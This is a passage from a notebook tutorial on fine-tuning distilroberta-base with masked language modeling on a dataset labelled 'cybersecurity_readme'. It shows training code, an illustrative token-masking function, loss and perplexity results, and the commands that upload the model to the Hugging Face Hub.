CommitInfo(commit_url='https://huggingface.co/LDDon/distilgpt2-finetuned-cybersecurity_readme/commit/0c28e48a50dffebc2c15ce1ba6bb665d78251966', commit_message='End of training', commit_description='', oid='0c28e48a50dffebc2c15ce1ba6bb665d78251966', pr_url=None, pr_revision=None, pr_num=None)

You can now share this model with all your friends, family, favorite pets: they can all load it with the identifier `"your-username/the-name-you-picked"` so for instance:

```python
from transformers import AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained("sgugger/my-awesome-model")
```

## Masked language modeling

For masked language modeling (MLM) we are going to use the same preprocessing as before for our dataset with one additional step: we will randomly mask some tokens (by replacing them by `[MASK]`) and the labels will be adjusted to only include the masked tokens (we don't have to predict the non-masked tokens).

We will use the [`distilroberta-base`](https://huggingface.co/distilroberta-base) model for this example. You can pick any of the checkpoints listed [here](https://huggingface.co/models?filter=masked-lm) instead:

In [33]:
model_checkpoint = "distilroberta-base"

We can apply the same tokenization function as before; we just need to update our tokenizer to use the checkpoint we just picked:

In [34]:
tokenizer = AutoTokenizer.from_pretrained(model_checkpoint, use_fast=True)
tokenized_datasets = dataset.map(tokenize_function, batched=True, num_proc=4, remove_columns=["text"])

And like before, we group texts together and chunk them in samples of length `block_size`. You can skip that step if your dataset is composed of individual sentences.

In [35]:
lm_datasets = tokenized_datasets.map(
    group_texts,
    batched=True,
    batch_size=1000,
    num_proc=4,
)

The rest is very similar to what we had, with two exceptions. First we use a model suitable for masked LM:

In [36]:
from transformers import AutoModelForMaskedLM
model = AutoModelForMaskedLM.from_pretrained(model_checkpoint)

Some weights of the model checkpoint at distilroberta-base were not used when initializing RobertaForMaskedLM: ['roberta.pooler.dense.bias', 'roberta.pooler.dense.weight']
- This IS expected if you are initializing RobertaForMaskedLM from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model).
- This IS NOT expected if you are initializing RobertaForMaskedLM from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model).


We redefine our `TrainingArguments`:

In [37]:
model_name = model_checkpoint.split("/")[-1]
training_args = TrainingArguments(
    f"{model_name}-finetuned-cybersecurity_readme2",
    evaluation_strategy = "epoch",
    learning_rate=2e-5,
    weight_decay=0.01,
    push_to_hub=True,
)

Like before, the last argument sets everything up so we can push the model to the [Hub](https://huggingface.co/models) regularly during training. Remove it if you didn't follow the installation steps at the top of the notebook. If you want to save your model locally under a name that is different from the name of the repository it will be pushed to, or if you want to push your model under an organization and not your namespace, use the `hub_model_id` argument to set the repo name (it needs to be the full name, including your namespace: for instance `"sgugger/bert-finetuned-wikitext2"` or `"huggingface/bert-finetuned-wikitext2"`).

Finally, we use a special `data_collator`. The `data_collator` is a function that is responsible for taking the samples and batching them in tensors. In the previous example, we had nothing special to do, so we just used the default for this argument. Here we want to do the random masking. We could do it as a pre-processing step (like the tokenization) but then the tokens would always be masked the same way at each epoch. By doing this step inside the `data_collator`, we ensure this random masking is done in a new way each time we go over the data.

To do this masking for us, the library provides a `DataCollatorForLanguageModeling`. We can adjust the probability of the masking:

In [38]:
from transformers import DataCollatorForLanguageModeling
data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=0.15)
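
What this masking does to one sample, as an added example in plain Python (not the library's code and not part of the original notebook): each non-special token is selected with probability `mlm_probability`, labels are `-100` everywhere else so the loss ignores them, and selected tokens get the BERT-style 80/10/10 replacement that `DataCollatorForLanguageModeling` applies by default. The token ids, vocabulary size and helper names are constructed for illustration.

```python
import random

IGNORE_INDEX = -100   # label value the loss skips (PyTorch cross-entropy ignore_index)
MASK_ID = 999         # constructed stand-in for the tokenizer's mask token id
VOCAB_SIZE = 1000     # constructed vocabulary size
SPECIAL_IDS = {0, 2}  # constructed stand-ins for start/end-of-sequence ids


def mask_tokens(input_ids, rng, mlm_probability=0.15):
    """Return (masked_inputs, labels) for one sequence of token ids."""
    inputs, labels = list(input_ids), []
    for i, tok in enumerate(input_ids):
        # Special tokens are never selected; other tokens with probability p.
        if tok in SPECIAL_IDS or rng.random() >= mlm_probability:
            labels.append(IGNORE_INDEX)
            continue
        labels.append(tok)  # the model must predict the original id here
        roll = rng.random()
        if roll < 0.8:
            inputs[i] = MASK_ID  # 80%: replace with the mask token
        elif roll < 0.9:
            inputs[i] = rng.randrange(VOCAB_SIZE)  # 10%: random token
        # remaining 10%: the input keeps the original token
    return inputs, labels


def selected_positions(labels):
    """Indices the loss is computed on."""
    return [i for i, lab in enumerate(labels) if lab != IGNORE_INDEX]


# Constructed sample: one block of 128 ids framed by the special ids 0 and 2.
SAMPLE = [0] + [10 + (7 * i) % 900 for i in range(126)] + [2]


def epoch_masks(seed, epochs=3):
    """Dynamic masking: a fresh random draw every time the sample is batched."""
    rng = random.Random(seed)
    return [selected_positions(mask_tokens(SAMPLE, rng)[1]) for _ in range(epochs)]


if __name__ == "__main__":
    for epoch, positions in enumerate(epoch_masks(seed=0), start=1):
        print(f"epoch {epoch}: {len(positions)} of {len(SAMPLE)} tokens selected -> {positions}")
```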

In [39]:
small_train_dataset = lm_datasets["train"].shuffle(seed=42).select(range(1000))
small_eval_dataset = lm_datasets["validation"].shuffle(seed=42).select(range(1000))

Then we just have to pass everything to `Trainer` and begin training:

In [40]:
trainer = Trainer(
    model=model,
    args=training_args,
    train_dataset=small_train_dataset,
    eval_dataset=small_eval_dataset,
    data_collator=data_collator,
)

In [41]:
trainer.train()

Epoch,Training Loss,Validation Loss
1,No log,1.815138
2,No log,1.75278
3,No log,1.701787


TrainOutput(global_step=375, training_loss=2.1721022135416668, metrics={'train_runtime': 545.9654, 'train_samples_per_second': 5.495, 'train_steps_per_second': 0.687, 'total_flos': 99466354944000.0, 'train_loss': 2.1721022135416668, 'epoch': 3.0})

Like before, we can evaluate our model on the validation set. The perplexity is much lower than for the CLM objective because for the MLM objective, we only have to make predictions for the masked tokens (which represent 15% of the total here) while having access to the rest of the tokens. It's thus an easier task for the model.

In [42]:
eval_results = trainer.evaluate()
print(f"Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

Perplexity: 5.64


You can now upload the result of the training to the Hub by executing this instruction:

In [43]:
trainer.push_to_hub()

CommitInfo(commit_url='https://huggingface.co/LDDon/distilroberta-base-finetuned-cybersecurity_readme2/commit/16e5bb2bd8f78d9270ffb6f81da9f31cd20a2bc4', commit_message='End of training', commit_description='', oid='16e5bb2bd8f78d9270ffb6f81da9f31cd20a2bc4', pr_url=None, pr_revision=None, pr_num=None)

You can now share this model with all your friends, family, favorite pets: they can all load it with the identifier `"your-username/the-name-you-picked"` so for instance:

```python
from transformers import AutoModelForMaskedLM

model = AutoModelForMaskedLM.from_pretrained("sgugger/my-awesome-model")
```